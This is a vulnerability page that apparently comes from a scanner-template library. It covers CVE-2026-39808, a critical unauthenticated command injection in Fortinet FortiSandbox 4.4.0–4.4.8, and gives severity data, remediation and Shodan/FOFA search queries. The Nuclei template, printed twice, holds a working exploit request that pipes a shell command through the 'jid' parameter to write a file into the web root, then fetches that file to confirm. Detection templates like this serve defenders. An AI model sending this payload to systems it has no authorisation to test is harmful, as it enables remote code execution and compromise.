Fortinet FortiSandbox - Command Injection

CVE-2026-39808

Verified

Description

Fortinet FortiSandbox 4.4.0 through 4.4.8 contains a command injection caused by improper neutralization of special elements in OS commands, letting attackers execute unauthorized code or commands, exploit requires crafted input.

Severity

Critical

CVSS Score

9.8

Exploit Probability

25%

Affected Product

fortisandbox

Published Date

April 19, 2026

Template Author

dhiyaneshdk

CVE-2026-39808.yaml

id: CVE-2026-39808

info:
  name: Fortinet FortiSandbox - Command Injection
  author: DhiyaneshDk
  severity: critical
  description: |
    Fortinet FortiSandbox 4.4.0 through 4.4.8 contains a command injection caused by improper neutralization of special elements in OS commands, letting attackers execute unauthorized code or commands, exploit requires crafted input.
  impact: |
    Attackers can execute arbitrary code or commands, potentially leading to full system compromise.
  remediation: Upgrade FortiSandbox to version 4.4.9 or later.
  reference:
    - https://fortiguard.fortinet.com/psirt/FG-IR-26-100
    - https://nvd.nist.gov/vuln/detail/CVE-2026-39808
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-39808
    cwe-id: CWE-78
    epss-score: 0.25454
    epss-percentile: 0.96294
  metadata:
    verified: true
    max-request: 2
    vendor: fortinet
    product: fortisandbox
    shodan-query: http.title:"FortiSandbox"
    fofa-query: title="FortiSandbox"
  tags: cve,cve2026,fortisandbox,fortinet,rce,intrusive,file-upload

variables:
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(8))}}"

http:
  - raw:
      - |
        GET /fortisandbox/job-detail/tracer-behavior?jid=%7c%28echo+{{string}}+%3e+%2fweb%2fng%2f{{filename}}.txt%29%7c HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains(body, 'fortisandbox')"
        internal: true

  - raw:
      - |
        GET /ng/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, '{{string}}')"
        condition: and
# digest: 4b0a00483046022100e46d75813a1365674b7744b8bcebe3279af334d6923f55d3d798e90af5b3618e022100f5f2ee5f0024f02e668e3ea7c11d3c6c4f17d141f8fa25cc5cf59a56bd5265f9:922c64590222798bb761d5b6d8e72950

9.8Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID:

cve-2026-39808

CWE ID:

cwe-78

References

https://fortiguard.fortinet.com/psirt/FG-IR-26-100 https://nvd.nist.gov/vuln/detail/CVE-2026-39808

Remediation Steps

Upgrade FortiSandbox to version 4.4.9 or later.

id: CVE-2026-39808

info:
  name: Fortinet FortiSandbox - Command Injection
  author: DhiyaneshDk
  severity: critical
  description: |
    Fortinet FortiSandbox 4.4.0 through 4.4.8 contains a command injection caused by improper neutralization of special elements in OS commands, letting attackers execute unauthorized code or commands, exploit requires crafted input.
  impact: |
    Attackers can execute arbitrary code or commands, potentially leading to full system compromise.
  remediation: Upgrade FortiSandbox to version 4.4.9 or later.
  reference:
    - https://fortiguard.fortinet.com/psirt/FG-IR-26-100
    - https://nvd.nist.gov/vuln/detail/CVE-2026-39808
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-39808
    cwe-id: CWE-78
    epss-score: 0.25454
    epss-percentile: 0.96294
  metadata:
    verified: true
    max-request: 2
    vendor: fortinet
    product: fortisandbox
    shodan-query: http.title:"FortiSandbox"
    fofa-query: title="FortiSandbox"
  tags: cve,cve2026,fortisandbox,fortinet,rce,intrusive,file-upload

variables:
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(8))}}"

http:
  - raw:
      - |
        GET /fortisandbox/job-detail/tracer-behavior?jid=%7c%28echo+{{string}}+%3e+%2fweb%2fng%2f{{filename}}.txt%29%7c HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains(body, 'fortisandbox')"
        internal: true

  - raw:
      - |
        GET /ng/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(body, '{{string}}')"
        condition: and
# digest: 4b0a00483046022100e46d75813a1365674b7744b8bcebe3279af334d6923f55d3d798e90af5b3618e022100f5f2ee5f0024f02e668e3ea7c11d3c6c4f17d141f8fa25cc5cf59a56bd5265f9:922c64590222798bb761d5b6d8e72950

Fortinet FortiSandbox - Command Injection

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Fortinet FortiSandbox - Command Injection

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps